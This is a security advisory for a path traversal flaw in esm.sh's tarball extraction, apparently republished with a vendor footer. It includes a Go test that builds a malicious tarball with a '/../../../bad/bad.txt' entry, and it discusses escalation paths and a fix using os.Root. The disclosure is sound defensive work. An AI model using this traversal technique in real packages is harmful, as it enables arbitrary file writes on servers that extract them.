esm.sh has a path traversal in extractPackageTarball enables file writes from malicious packages
GHSA-2657-3c98-63jq · CVE-2026-23644 · GO-2026-4332
Published · Modified
Description
Summary
The commit does not actually fix the path traversal bug. path.Clean basically normalizes a path but does not prevent absolute paths in a malicious tar file.
PoC
This test file can demonstrate the basic idea pretty easily:
package server
import (
"archive/tar"
"bytes"
"compress/gzip"
"testing"
)
// TestExtractPackageTarball_PathTraversal tests the extractPackageTarball function
// with a malicious tarball containing a path traversal attempt
func TestExtractPackageTarball_PathTraversal(t *testing.T) {
// Create a temporary directory for testing
installDir := "./testdata/good"
// Create a malicious tarball with path traversal
var buf bytes.Buffer
gw := gzip.NewWriter(&buf)
tw := tar.NewWriter(gw)
// Add a normal file
content := []byte("export const foo = 'bar';")
header := &tar.Header{
Name: "package/index.js",
Mode: 0644,
Size: int64(len(content)),
Typeflag: tar.TypeReg,
}
if err := tw.WriteHeader(header); err != nil {
t.Fatal(err)
}
if _, err := tw.Write(content); err != nil {
t.Fatal(err)
}
// Add a malicious file with path traversal
bad := []byte("bad")
header = &tar.Header{
Name: "/../../../bad/bad.txt",
Mode: 0644,
Size: int64(len(bad)),
Typeflag: tar.TypeReg,
}
if err := tw.WriteHeader(header); err != nil {
t.Fatal(err)
}
if _, err := tw.Write(bad); err != nil {
t.Fatal(err)
}
tw.Close()
gw.Close()
// Call extractPackageTarball with the malicious tarball
if err := extractPackageTarball(installDir, "test-package", bytes.NewReader(buf.Bytes())); err != nil {
t.Errorf("extractPackageTarball returned error: %v", err)
}
}
Impact
It, at the very least, seems to enable overwriting the esm.sh configuration file and poisoning cached packages.
Arbitrary file write can lead to server-side code execution (e.g. Writing to cron files) but it may not be feasible for the default deployment configuration that is checked in. Whether some self-hosted configuration is modified to enable code execution is unclear.
The limiting factors in the default setup that limit escalating this to code execution:
extractPackageTarballhas a file-extension check which makes some more "obvious" escalations like overwriting binaries in/esm/bin(e.g.deno) impractical since it requires the target file to have an allowlisted extension.- Using the
Dockerfilein the repo as a baseline for the typical setup: The binary does not run as root and, for the most part, can really only write to/tmpand it's home directory. - The deployment scripts do not seem to rely on executing potentially poisoned files in `/tmp.
Fix
Using os.Root seems like it will solve this issue and doesn't require new dependencies.
References
- WEB https://github.com/esm-dev/esm.sh/security/advisories/GHSA-2657-3c98-63jq
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-23644
- WEB https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16
- WEB https://github.com/esm-dev/esm.sh/commit/c62ab83c589e7b421a0e1376d2a00a4e48161093
- PACKAGE https://github.com/esm-dev/esm.sh
- WEB https://pkg.go.dev/vuln/GO-2025-4138
- WEB https://pkg.go.dev/vuln/GO-2026-4332
Ready to move
Start Securing
Free, no credit card | First findings in minutes